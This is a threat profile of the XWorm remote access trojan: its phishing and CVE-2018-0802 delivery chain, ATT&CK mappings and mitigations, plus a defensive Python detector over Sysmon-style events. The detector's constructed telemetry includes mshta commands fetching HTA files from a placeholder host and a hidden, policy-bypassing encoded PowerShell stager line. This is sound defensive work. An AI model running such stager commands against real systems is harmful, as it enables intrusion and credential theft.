Malware

XWorm

Start Date:

Most Recent Activity:

Executive Summary

XWorm is a .NET-based remote access trojan (RAT) that is commonly delivered through phishing campaigns and multi-stage infection chains. Once running it gives the operator remote control of the host, credential theft and arbitrary payload execution over a command-and-control (C2) channel; its delivery chains typically rely on fileless execution and process injection to keep the payload off disk and out of sight.



Overview

Description

Type: Remote Access Trojan (RAT) / Commodity Malware

Delivery:
Phishing emails with malicious Office documents, embedded OLE objects, exploit-assisted chains

Capabilities:
Remote control, payload execution, credential theft, persistence, process injection/hollowing, C2 communication

Notable Characteristics:
Frequently delivered via phishing campaigns that exploit the Office Equation Editor (CVE-2018-0802), then chain into PowerShell execution, a fileless .NET loader and process hollowing to evade detection before establishing C2 communication.



Attack Flow

Flow
Phishing Email → Excel Attachment → OLE Object → CVE-2018-0802 / HTA → PowerShell → .NET Loader → XWorm Payload → Process Hollowing → C2
  • The victim receives a phishing email with a malicious Office (typically Excel) attachment
  • Opening it triggers an embedded OLE object or the Equation Editor exploit (CVE-2018-0802)
  • The exploit or OLE object retrieves and launches an HTA file
  • The HTA hands off to PowerShell, which runs the next stage in memory
  • A fileless .NET loader retrieves the XWorm payload
  • The loader places XWorm inside a legitimate process via process hollowing or injection
  • XWorm executes and connects to its C2 infrastructure


MITRE ATT&CK Techniques

MITRE ATT&CK
Techniques mapped from the attack flow above:
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File
  • T1203 Exploitation for Client Execution (CVE-2018-0802)
  • T1218.005 System Binary Proxy Execution: Mshta
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1105 Ingress Tool Transfer (loader and payload retrieval)
  • T1055.012 Process Injection: Process Hollowing
  • T1555 Credentials from Password Stores
  • T1071 Application Layer Protocol or T1095 Non-Application Layer Protocol for the C2 channel, depending on the transport observed in a given sample


Mitigations

Mitigations
  • Identity Protections: Enforce MFA, alert on unexpected account creation and privilege changes, and limit which accounts can reach sensitive systems so that stolen credentials have less reach
  • Endpoint Controls: Block Office applications from spawning child processes (for example with Attack Surface Reduction rules), constrain PowerShell with Constrained Language Mode and script block logging, and alert on injection behaviour such as .NET utilities spawned by script hosts
  • Network Monitoring: Alert on outbound connections from script hosts and from processes that normally have no network activity, and on staged payload retrieval (HTA, script, .NET loader) from newly seen hosts
  • User Awareness: Train users to recognise phishing emails and to report unexpected Office attachments rather than opening them


Detections

Indicators of Compromise (IOCs)

Detection Rules

Rule      View   Download
YARA      N/A    N/A
Sigma     N/A    N/A
Suricata  N/A    N/A
SPL       N/A    N/A
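No detection rules are published on this profile, so the following is an added example (written for this page, not code from the XWorm analysis or any vendor) of the correlation logic a SOC would run to catch the chain in the attack flow above and the endpoint monitoring called for under Mitigations. It walks Sysmon-style process-create (Event ID 1) and network-connect (Event ID 3) events, rebuilds the process tree and flags each suspicious link: Office or the Equation Editor spawning a script host, a PowerShell download cradle, a .NET utility spawned by PowerShell (the hollowing precursor), and network activity from a process whose ancestry leads back to Office. The event shapes, PIDs, command lines and 203.0.113.0/24 (TEST-NET-3) addresses are constructed; the set of hollowing targets in NET_HOSTS is an assumption, since the profile does not name one.

```python
"""Correlate Sysmon-style events into the Office -> HTA -> PowerShell -> hollowed host -> C2 chain.

Constructed example for this profile. Event shapes mimic Sysmon Event ID 1 (process create)
and 3 (network connect); all hosts, PIDs, command lines and addresses are made up.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQNEDT = "eqnedt32.exe"  # Office Equation Editor, the component exploited by CVE-2018-0802
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumption: signed .NET utilities that .NET loaders commonly hollow; the profile names no target.
NET_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe", "aspnet_compiler.exe", "applaunch.exe"}
# Download-cradle and evasion switches typical of stager command lines.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string"
    r"|(?:^|\s)-e(?:c|nc|ncodedcommand)?(?:\s|$)|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass
class Event:
    eid: int            # 1 = process create, 3 = network connect
    pid: int
    ppid: int = 0
    image: str = ""     # full path; reduced to a lowercase basename when indexed
    cmdline: str = ""
    dest: str = ""      # "ip:port" for network events


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


def build_tree(events: List[Event]) -> Dict[int, Proc]:
    """Index process-create events by PID so ancestry can be walked later."""
    return {e.pid: Proc(e.pid, e.ppid, e.image.lower().rsplit("\\", 1)[-1], e.cmdline)
            for e in events if e.eid == 1}


def ancestors(procs: Dict[int, Proc], pid: int, limit: int = 16) -> List[Proc]:
    """Return the process and its ancestors, nearest first; stops at unknown PIDs or after `limit` hops."""
    chain: List[Proc] = []
    while pid in procs and len(chain) < limit:
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def detect(events: List[Event]) -> List[dict]:
    """Emit one finding per suspicious link in the delivery chain, in event order."""
    procs = build_tree(events)
    findings: List[dict] = []

    def add(rule: str, pid: int, chain: List[Proc]) -> None:
        findings.append({"rule": rule, "pid": pid, "chain": [p.image for p in chain]})

    for e in events:
        chain = ancestors(procs, e.pid)
        if not chain:               # no create event seen for this PID
            continue
        proc, parent = chain[0], (chain[1] if len(chain) > 1 else None)
        if e.eid == 1:
            if parent and parent.image in OFFICE and proc.image in SCRIPT_HOSTS:
                add("office_spawns_script_host", proc.pid, chain)
            if parent and parent.image == EQNEDT:   # Equation Editor should never spawn children
                add("equation_editor_spawns_child", proc.pid, chain)
            if proc.image in POWERSHELL and CRADLE.search(proc.cmdline):
                add("powershell_download_cradle", proc.pid, chain)
            if parent and parent.image in POWERSHELL and proc.image in NET_HOSTS:
                add("dotnet_host_spawned_by_powershell", proc.pid, chain)  # hollowing precursor
        elif e.eid == 3 and any(p.image in OFFICE or p.image == EQNEDT for p in chain[1:]):
            if proc.image in SCRIPT_HOSTS:
                add("stager_network_from_office_chain", proc.pid, chain)
            elif proc.image in NET_HOSTS:
                add("c2_from_office_chain", proc.pid, chain)
    return findings


SAMPLE_EVENTS = [  # constructed telemetry: two malicious branches plus benign noise
    Event(1, 800, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(1, 900, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    Event(1, 4100, 800, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", '"EXCEL.EXE" invoice.xls'),
    Event(1, 4110, 4100, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),              # benign: printing
    Event(1, 4120, 800, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe Get-ChildItem C:\\Temp"),                                       # benign: admin shell
    Event(1, 4300, 4100, r"C:\Windows\System32\mshta.exe", "mshta.exe http://203.0.113.10/open.hta"),
    Event(1, 4400, 4300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event(3, 4400, dest="203.0.113.10:80"),                                                 # loader fetch
    Event(1, 4500, 4400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "RegAsm.exe"),
    Event(3, 4500, dest="203.0.113.20:7000"),                                               # C2 beacon
    Event(1, 4600, 900, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
          "EQNEDT32.EXE -Embedding"),                                                       # DCOM-launched
    Event(1, 4700, 4600, r"C:\Windows\System32\cmd.exe", "cmd /c mshta http://203.0.113.10/eq.hta"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['rule']:<36} pid={f['pid']:<5} {' <- '.join(f['chain'])}")
```

The Equation Editor branch is handled separately because EQNEDT32.EXE is started by DCOM under svchost.exe, not by the Office application, so a parent-is-Office rule alone misses it; the ancestry walk is what ties the later network activity back to the document. On real telemetry the benign splwow64.exe and interactive PowerShell events stay silent, which is the false-positive check to keep when porting this logic to Sigma or SPL.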

Research & References

References
This post is licensed under CC BY 4.0 by the author.